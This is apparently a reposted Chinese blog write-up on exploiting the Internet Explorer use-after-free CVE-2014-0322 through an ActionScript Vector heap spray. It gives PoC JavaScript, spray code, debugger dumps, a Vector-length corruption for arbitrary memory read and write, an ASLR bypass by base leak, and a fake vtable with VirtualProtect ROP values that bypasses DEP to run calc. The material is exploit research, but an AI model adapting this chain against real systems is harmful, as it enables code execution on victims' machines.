CVE-2014-0322 Exploit ActionScript Heap Spray

栏目: JavaScript · 发布时间: 6年前

内容简介:之前调试CVE-2014-0322这个洞的时候用的是Js的heapspray技术,这几天因为在项目中尝试一点新的利用方法稍微做了点关于ActionScript的喷射利用技术,还是挺有意思,不过也是和Js的heapspray技术差不太多。总体利用思路是通过漏洞修改数组长度达到地址任意读写,继而leak基址构造rop,修改虚表指针达到控制eip跳到rop链。调试环境:CVE-2014-0322在之前的漏洞分析文章中已经提过了,一个经典的UAF漏洞,通过控制内存占位可以达到inc一个字节的目的,内存占位的poc

之前调试CVE-2014-0322这个洞的时候用的是Js的heapspray技术,这几天因为在项目中尝试一点新的利用方法稍微做了点关于ActionScript的喷射利用技术,还是挺有意思,不过也是和Js的heapspray技术差不太多。总体利用思路是通过漏洞修改数组长度达到地址任意读写,继而leak基址构造rop,修改虚表指针达到控制eip跳到rop链。

调试环境:

Windows 7 SP1
mshtml 10.0.9200.16438
kernel32 6.1.7601.17932
Adobe Flash 15.0.0.223

0x02 漏洞分析

CVE-2014-0322在之前的漏洞分析文章中已经提过了,一个经典的UAF漏洞,通过控制内存占位可以达到inc一个字节的目的,内存占位的poc

function handler() {
  this.outerHTML = this.outerHTML;

    elem = document.createElement("div");
    elem.className = add(0x7c/2) + dword2date(0x12121008) + add(0x14/2) + dword2date(0x12121000) + dword2date(0x12121008) + add(0x10/2) + dword2date(0x12120ff3) + add(0x290/2-2);			
}

0x03 ActionScript Vector 喷射

测试采用的是Flash 15的版本(实际测试15、16、17、18都可以很好的支持)

public function Main():void 
	{
		for (var i:int = 0; i < spray.length; i++) {
			spray[i] = new Vector.<uint>(1008)
			spray[i][1] = 0x12121014
			spray[i][2] = 0x12120d28
		}
}

这样可以在IE10的环境下(IE11也支持)精确的喷射。

0:018> dd 12122000
12122000  000003f0 064b2000 00000000 12121014
12122010  12120d28 00000000 00000000 00000000
12122020  00000000 00000000 00000000 00000000
12122030  00000000 00000000 00000000 00000000
12122040  00000000 00000000 00000000 00000000
12122050  00000000 00000000 00000000 00000000
12122060  00000000 00000000 00000000 00000000
12122070  00000000 00000000 00000000 00000000
0:018> dd 12123000
12123000  000003f0 064b2000 00000000 12121014
12123010  12120d28 00000000 00000000 00000000
12123020  00000000 00000000 00000000 00000000
12123030  00000000 00000000 00000000 00000000
12123040  00000000 00000000 00000000 00000000
12123050  00000000 00000000 00000000 00000000
12123060  00000000 00000000 00000000 00000000
12123070  00000000 00000000 00000000 00000000

可以看出每一个Vector对象中第一个dword是对象的大小,第二个是应该是对象指针,第三个dword以后就是Vector的数据了,这样我们就可以通过漏洞修改某一个Vector数组的长度直接数组越界写,在修改下一个Vector的长度为0xffffffff直接达到内存任意读写目的(这里adobe居然没有进行任何安全检查简直ZZ Orz)

0x04 内存任意读写

在将一个Vector的长度修改以后,接下来就可以越界读写后一个Vector的长度大小,直接简单粗暴修改为0xffffffff,内存任意读写

0:018> dd 12122000
12122000  ffffffff 05f32000 00000000 12121014
12122010  12120d28 00000000 00000000 00000000
12122020  00000000 00000000 00000000 00000000
12122030  00000000 00000000 00000000 00000000
12122040  00000000 00000000 00000000 00000000
12122050  00000000 00000000 00000000 00000000
12122060  00000000 00000000 00000000 00000000
12122070  00000000 00000000 00000000 00000000

0x05 leak基址 & Bypass ASLR

leak基址就很简单了,已经内存任意读,读到Vector对象的虚表地址,直接根据偏移就可以计算出Flash的加载基址,获得Flash的基址以后,在根据Flash的导入表就可以得到VritualProtect地址,根据leak的VritualProtect地址就可以很方便的构造一个非常简单的rop链。

0x06 控制eip & Bypass DEP

控制eip我们需要修改Vector对象的虚表,将Vector的虚表指针修改成堆上的地址,在调用Vector的函数控制eip。

write(spray[i][i2 + 1] - 1, 0x12122008, i)   //将Vector对象的虚表改为堆上的地址,伪造一个虚表

//伪造一个虚表,使得执行writeUTF函数的时候指向的是xchg_eax_esp的地址,达到控制eip的效果,在bypass DEP
spray[i][00] = virtualprotect_addr
spray[i][01] = 0x121220a0
spray[i][02] = 0x12122018
spray[i][03] = 0x200
spray[i][04] = 0x40
spray[i][05] = 0x12122008
spray[i][35] = xchg_eax_esp_addr

//调用虚函数,控制EIP
ba.writeUTF("calc")

以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

Erlang趣学指南

Erlang趣学指南

邓辉、孙鸣 / 人民邮电出版社 / 2016-9-7 / 79.00元

这是一本讲解Erlang编程语言的入门指南,内容通俗易懂,插图生动幽默,示例短小清晰,结构安排合理。书中从Erlang的基础知识讲起,融汇所有的基本概念和语法。内容涉及模块、函数、类型、递归、错误和异常、常用数据结构、并行编程、多处理、OTP、事件处理,以及所有Erlang的重要特性和强大功能。一起来看看 《Erlang趣学指南》 这本书的介绍吧!

XML、JSON 在线转换
XML、JSON 在线转换

在线XML、JSON转换工具

Markdown 在线编辑器
Markdown 在线编辑器

Markdown 在线编辑器

UNIX 时间戳转换
UNIX 时间戳转换

UNIX 时间戳转换